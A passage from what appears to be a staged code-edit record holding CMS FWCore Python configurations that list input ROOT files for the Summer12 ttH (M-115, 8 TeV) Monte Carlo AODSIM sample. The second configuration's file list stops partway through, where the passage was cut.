"step-3": "<mask token>\nmaxEvents = cms.untracked.PSet(input=cms.untracked.int32(-1))\nreadFiles = cms.untracked.vstring()\nsecFiles = cms.untracked.vstring()\nsource = cms.Source('PoolSource', fileNames=readFiles, secondaryFileNames=\n secFiles)\nreadFiles.extend([\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FE26AAB2-D90B-E211-AD0F-0025902009B8.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FCB6A333-C70B-E211-8C99-001E67396D51.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FA9CB2B5-D90B-E211-82B1-001E67397B07.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F8F81697-E90B-E211-9A48-002590200834.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F88B7838-C70B-E211-8971-001E673968F1.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F6481280-E90B-E211-8349-002590200B34.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F4DAB680-B90B-E211-BE7E-003048D47A6C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F2F3F436-C70B-E211-A3A4-002481E1511E.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F03693B3-D90B-E211-8CFB-001E67398633.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EEF20E3B-C70B-E211-953A-002590200970.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EEA69380-E90B-E211-833A-002590200970.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EE92E708-A90B-E211-BE6A-001E67397B07.root'\n ,\n 
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EC8A6530-C70B-E211-9D59-002590200840.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EAE34E85-B90B-E211-B5AD-003048673F3A.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EACF738F-E90B-E211-8D44-00259020081C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/E43E9F40-C70B-E211-8CFE-001E67396644.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DEF585B4-D90B-E211-AD4B-002590200B38.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DE991237-C70B-E211-A065-001E67397003.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DE69B13F-B90B-E211-A320-002481E1511E.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DCDE4B42-C70B-E211-9F88-003048D4602A.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DC7EDE05-A90B-E211-B465-0025902008F4.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DAFF741D-A90B-E211-B24E-001E673969D2.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D865D241-B90B-E211-A391-003048673F26.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D6C4A74C-C70B-E211-B449-003048D45F78.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D4EB5C31-C70B-E211-AC1B-002590200AD0.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D49F4B34-C70B-E211-99F4-0025B3E06400.root'\n 
,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D2C6963C-C70B-E211-9D24-002590200908.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D26CAF3C-C70B-E211-A812-002590200930.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D026AE93-B90B-E211-9E76-002481E14D76.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CCD8F139-C70B-E211-B2E8-003048D47A4C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CA85ABB8-D90B-E211-A2BB-001E67397E13.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CA63512E-C70B-E211-8DDF-001E672CC1E7.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C480E406-A90B-E211-8B58-001E67397D00.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C0D5E949-9C0B-E211-A208-001E673967C5.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C0D100AE-D90B-E211-8962-001E67396DBA.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/BCF27C36-C70B-E211-876B-002590200A6C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/B4E711BB-D90B-E211-A42C-001E67396E3C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/B2A005DE-D90B-E211-94B3-001E67397D91.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AC3D508B-B90B-E211-AB8D-003048D45F2C.root'\n ,\n 
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AAC74E91-B90B-E211-A9FF-002590200A98.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AAAE1D0A-A90B-E211-907D-001E67398CB9.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A89EA633-C70B-E211-AF12-0025902009A4.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A836D251-C70B-E211-BFDD-0025902008E4.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A448E095-E90B-E211-8CED-001E673969D2.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9EBE5A69-C70B-E211-A36E-001E67398E12.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9C84FAB1-D90B-E211-8EDF-001E67396874.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9AFA54C5-D90B-E211-9C13-001E67396568.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9A4A0F32-C70B-E211-A372-002590200898.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/94BE773D-C70B-E211-836F-001E67398CE1.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/944B6544-B90B-E211-920A-002481E1511E.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/90CBB57E-E90B-E211-AB2F-0025902009C0.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8E16A8F3-D90B-E211-83D6-002590200B0C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8ACD8F9C-B90B-E211-8F86-002590200B4C.root'\n 
,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8ABCBFC1-D90B-E211-9C77-002590200B68.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8AAE9A07-A90B-E211-ABCF-001E673967C5.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8A5DE24C-C70B-E211-9271-002590200988.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/88CA0942-C70B-E211-A894-0025B31E3CC0.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7EFFEF3A-C70B-E211-A78B-001E67396A63.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7CDD1A9C-B90B-E211-99CE-003048D45FD8.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7A951BB1-D90B-E211-B97A-003048D476B4.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/78C1620C-A90B-E211-AF89-001E67396761.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/748AA33D-C70B-E211-AA21-001E67398390.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/74013EE7-D90B-E211-B929-001E673970C1.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/726A8A0A-A90B-E211-86C8-001E67397094.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/70698A49-C70B-E211-BE12-002590200A28.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6E05B863-C70B-E211-B476-002590200938.root'\n ,\n 
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6E03CAFF-D90B-E211-96B9-001E67396C52.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6CB7A769-C70B-E211-A569-002590200A80.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6C3E469D-B90B-E211-93ED-003048D45FE8.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/68D8E30B-A90B-E211-9884-003048673F24.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6644544A-C70B-E211-B9D8-001E67398E49.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/60FAAC62-9C0B-E211-B091-002590200B00.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5E932B7F-F60B-E211-A37C-001E67398C05.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5E2DFB9D-B90B-E211-8767-0025B31E3C3C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5C9369BA-D90B-E211-AB39-001E67397396.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5485BB36-C70B-E211-A62A-002590200A98.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/54439593-B90B-E211-AF3D-001E67398011.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/540D144A-9C0B-E211-BE2D-001E67396C9D.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5087B43E-B90B-E211-834E-003048D45FB6.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/50119B4C-C70B-E211-BC7A-00259020083C.root'\n 
,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4EBF2B87-B90B-E211-8020-003048D476C4.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E90C544-B90B-E211-92CF-001E67396DCE.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E42EA41-C70B-E211-89E7-002590200900.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E24ECEB-D90B-E211-B732-001E67397CCE.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4A3C00E2-D90B-E211-81B6-0025902009B0.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/487FA490-B90B-E211-B401-003048D45FE8.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/46C80D32-C70B-E211-ADC0-003048D45F98.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4680304C-B90B-E211-9E05-003048D479F2.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4442750C-A90B-E211-982C-001E67396644.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/428A4E96-B90B-E211-8098-002590200B74.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4048B9E0-D90B-E211-AD88-001E67397B07.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3ECD1D4C-B90B-E211-BCE7-003048D46034.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3EA42648-9C0B-E211-96A1-001E673972F6.root'\n ,\n 
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3E5C2DB5-D90B-E211-AFAA-9C8E991A143E.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3C91E824-A90B-E211-A981-001E67397D00.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3AF523B1-D90B-E211-A075-001E67396BB7.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3A3BB131-C70B-E211-AE83-001E67396DB5.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3642D7AF-D90B-E211-A79C-0030486740BA.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/30A91F44-9C0B-E211-ABA7-001E6739811A.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/30897650-C70B-E211-9F69-0025902008D8.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/304AEF43-C70B-E211-8856-003048D45F98.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2E24DE3A-B90B-E211-ACC7-0025B3E06556.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2CE679E6-D90B-E211-B835-002590200B0C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2C7439E9-D90B-E211-8919-002590200930.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2AFB4848-B90B-E211-A519-001E673965FE.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2A854B08-A90B-E211-9851-001E67397701.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2817039C-B90B-E211-9F8D-0025B31E3C58.root'\n 
,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/241AF10A-A90B-E211-BB12-001E67397CCE.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/240A3B43-B90B-E211-BA5F-002481E14FFC.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/20986287-B90B-E211-942A-003048D47A4C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1EB30D07-DA0B-E211-BE8F-001E67398E62.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1E2DEC38-B90B-E211-B323-003048D476C2.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1C490588-B90B-E211-99B7-003048D45FAE.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0E69E144-B90B-E211-AFD2-0025B3E05DB6.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0CF5EAB8-D90B-E211-AD4B-002590200AD0.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0CBE6239-B90B-E211-8155-001E67396A18.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/08A93150-9C0B-E211-9BF5-001E67396EAA.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0639D68C-B90B-E211-953D-003048D4609E.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/060DDA6A-C70B-E211-BF0C-001E67396D4C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/02C8D108-DA0B-E211-8141-001E67397396.root'\n ,\n 
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0078C0C1-D90B-E211-83A4-001E67396E32.root'\n ])\nsecFiles.extend([])\n",
"step-4": "import FWCore.ParameterSet.Config as cms\nmaxEvents = cms.untracked.PSet(input=cms.untracked.int32(-1))\nreadFiles = cms.untracked.vstring()\nsecFiles = cms.untracked.vstring()\nsource = cms.Source('PoolSource', fileNames=readFiles, secondaryFileNames=\n secFiles)\nreadFiles.extend([\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FE26AAB2-D90B-E211-AD0F-0025902009B8.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FCB6A333-C70B-E211-8C99-001E67396D51.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FA9CB2B5-D90B-E211-82B1-001E67397B07.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F8F81697-E90B-E211-9A48-002590200834.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F88B7838-C70B-E211-8971-001E673968F1.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F6481280-E90B-E211-8349-002590200B34.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F4DAB680-B90B-E211-BE7E-003048D47A6C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F2F3F436-C70B-E211-A3A4-002481E1511E.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F03693B3-D90B-E211-8CFB-001E67398633.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EEF20E3B-C70B-E211-953A-002590200970.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EEA69380-E90B-E211-833A-002590200970.root'\n ,\n 
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EE92E708-A90B-E211-BE6A-001E67397B07.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EC8A6530-C70B-E211-9D59-002590200840.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EAE34E85-B90B-E211-B5AD-003048673F3A.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EACF738F-E90B-E211-8D44-00259020081C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/E43E9F40-C70B-E211-8CFE-001E67396644.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DEF585B4-D90B-E211-AD4B-002590200B38.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DE991237-C70B-E211-A065-001E67397003.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DE69B13F-B90B-E211-A320-002481E1511E.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DCDE4B42-C70B-E211-9F88-003048D4602A.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DC7EDE05-A90B-E211-B465-0025902008F4.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DAFF741D-A90B-E211-B24E-001E673969D2.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D865D241-B90B-E211-A391-003048673F26.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D6C4A74C-C70B-E211-B449-003048D45F78.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D4EB5C31-C70B-E211-AC1B-002590200AD0.root'\n 
